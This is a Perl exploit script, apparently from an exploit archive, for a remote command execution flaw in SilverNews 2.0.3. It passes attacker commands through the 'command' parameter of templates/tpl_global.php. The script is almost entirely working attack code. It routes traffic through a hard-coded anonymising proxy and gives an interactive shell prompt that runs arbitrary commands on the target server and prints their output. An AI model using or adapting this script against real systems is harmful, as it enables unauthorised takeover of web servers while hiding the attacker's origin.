Exploit for the remote command execution vulnerability in Silvernews 2.0.3: discovered by: http://www.securityfocus.com/archive/1/407163/30/0/threaded sploit: -------- #!/usr/bin/perl ################TSL########################################################### # # # SilverNews Exploit inlcuded Proxy Server Function # THROAT SECURITY LABS # # vuln: http://www.target.com/templates/tpl_global.php?command=[command] # # ################TSL########################################################### $l="\015\012"; $t=0; my $sock; my $target; my $location; my $command; my $proxy; #define your proxyserver: $proxy = "200.186.217.122"; #brazil high anoynmity proxy use IO::Socket; sub sploit() { $sock = IO::Socket::INET->new(PeerAddr => $proxy, PeerPort => 80, Proto => "tcp") or die "No Connection to Your ProxyServer: $proxy at Port 80\n"; print $sock "GET $target/$location/templates/tpl_global.php?command=$command HTTP/1.1$l"; print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$l"; print $sock "Connection: close$l"; while (<$sock>) { if (/^HTTP\/1\.[0-2] ([0-9]{3}) .+$/ and $1 ne "200"){ print "Error! Got HTTP return code $1. Exciting!\n"; exit 1; } print if $t==1; $t=1 if /^$l$/; } } if (@ARGV != 2) { print "\n*** by lizard for [T]hroat [S]ecurity [L]abs\n"; print "-------------------------------------------------------\n\n"; print "* usage:\t $0 [target] [path] \n"; print "* example:\t $0 www.target.com newssystem \n"; print "----\n\n\n pia s. i love you forever ;)\n\n"; } else { $target = $ARGV[0]; $location = $ARGV[1]; print "sending exploit ... please wait\n"; sleep(1); while(1){ print "[sploit\@$target:/$location\] "; $_=<STDIN>; chop; next if /^$/; s/ /%20/; #if ($command=="exit") {exit} else {sploit()}; $command=$_; sploit(); } } #EOF#
